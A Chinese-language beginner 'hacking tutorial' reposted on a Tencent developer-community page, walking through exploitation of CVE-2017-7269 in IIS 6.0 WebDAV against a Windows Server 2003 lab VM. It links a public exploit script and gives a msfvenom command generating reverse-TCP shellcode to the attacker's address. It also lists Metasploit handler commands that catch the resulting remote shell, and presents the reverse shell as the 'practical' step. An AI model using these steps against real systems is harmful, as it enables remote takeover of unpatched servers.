首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

我们不一样的黑客渗透教程第三课,CVE20177269实战测试

很多人想学黑客知识,却不知如何入门,网上的教程也太繁琐,小白看了也头疼,那还是我来写黑客系列入门教程吧,跟着我做,你能黑客入门的。我已经写了两篇了,第1篇在

《我们不一样的黑客渗透教程第一课,粗暴的端口扫描》

,第2篇在《我们不一样的黑客渗透教程第二课,6行py写个端口扫描工具》。我就奇怪了,第1篇收藏量和关注量都极多,第2篇就没有人看了,难道我写的不是一个系列?今天第3篇教程,我们直接用CVE-2017-7269漏洞进行一次实战测试。三篇文章你融会贯通了,基本算黑客入门了。

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If:

一、我们要准备的工具

python2.7版本,下载地址在https://www.python.org/downloads/。我第2课中示例的是python3.0,这个漏洞用python3.0发送字节流不方便,所以我们还是用python2.7。

pentestbox,记得下载安装有 Metasploit 的 PentestBox的版本,地址:https://pentestbox.org/zh/#download。

win2003服务器版的虚拟机。由于头条不让在文章里放种子之类的下载地址,我会在评论里写出这个下载地址。

CVE-2017-7269漏洞的测试代码,地址:https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py。

二、测试环境的搭建

安装Win2003虚拟机后,要配置一个iis6运行环境。在管理您的服务器当中,添加或删除角色中配置iis6运行环境,要注意勾选asp.net支持,否则你可能测试不会成功。

最后一步你开启webdav支持,这样一来你配置的测试环境就成功了。

三、测试一下我们的poc

我的python27安装目录在d:/python27,我们把第一步下载的exploit.py改名为CVE-2017-7269.py放在d:/python27目录。我安装的2003服务器版的虚拟机的ip为192.168.1.102,我本机的ip为192.168.1.100。

我们把CVE-2017-7269.py文件里的第6行改成要测试目标的ip地址,我这里直接改为192.168.1.102了。

直接运行d:/python27/python.exe d:/python27/CVE-2017-7269.py,虚拟机里的任务管理器进程中就会出现计算器进程了。

如果你运行错误(有这个可能),请用editplus能显示行号的编辑器把CVE-2017-7269.py第16行删掉。

四、改写shellcode,反弹shell。

这个poc只是运行一个计算器而已,并没有实战价值。我们改写CVE-2017-7269.py,反弹一个shell。当然,这里我不讲解这个漏洞的原理和形成过程,也不讲解poc的编写,如果你这两点都会,你已经是国内一流黑客大牛了。我们在本文只讲解如何改造poc进行实战。

运行pentestbox后,输入以下命令生成一个反弹到192.168.1.100的shellcode(我本机ip是192.168.1.100)。如果你是win10系统,记得打开pentestbox要先输一下cmd,再输入以下命令,其它系统直接输入就行:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 lport=443 PrependMigrate=True PrependMigrateProc="calc.exe" EXITFUNC="process" -b "x00" -e x86/unicode_mixed BufferRegister=ESI -f raw

替换CVE-2017-7269.py文件里的shellcode。

复制你上边生成的shellcode,替换CVE-2017-7269.py文件里第13行shellcode的内容。

用Metasploit监听443端口。

打开pentestbox后,win10先输入cmd后,再依次输入以下命令,其它系统直接输入就行,一条命令一个回车:

msfconsole

use exploit/multi/handler

set payload windows/shell/reverse_tcp

set lport 443

set lhost 192.168.1.100

exploit

我们再在命令行里输入d:/python27/python CVE-2017-7269.py,那么你就会获得192.168.1.102的反弹shell了,直接进入192.168.1.102的机器了。

黑客渗透教程第3课内容有很多。有python27、win2003虚拟机、pentstbox的安装、虚拟机IIS6的安装和配置,还有用pentestbox生成我们需要的shellcode,以及CVE-2017-7269.py里的shellcode替换。内容虽然多,但是并不难,你照着我文章做是能成功的。如果你成功了,是否有一种我已经黑客入门了的满足感了呢?如果你在这其中遇到到了和文章内容不同的难题,欢迎在评论里提出,我会一一给大家回复的。黑客渗透教程第一季我准备只写4篇,从端口扫描、python配置、实战演练到最后一篇的细节补充就结束了。第二季黑客入门教程,我们换个角度再切入进去,敬请期待吧。

  • 发表于:
  • 原文链接http://kuaibao.qq.com/s/20171230A04JN200?refer=cp_1026
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券